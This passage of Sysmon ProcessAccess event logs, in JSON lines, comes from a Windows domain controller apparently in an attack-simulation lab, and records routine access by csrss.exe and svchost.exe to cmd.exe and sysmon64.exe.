05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2886,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-00104D030500}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-00104D030500}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2887,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2888,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2889,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2890,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2891,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2892,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2893,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2894,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 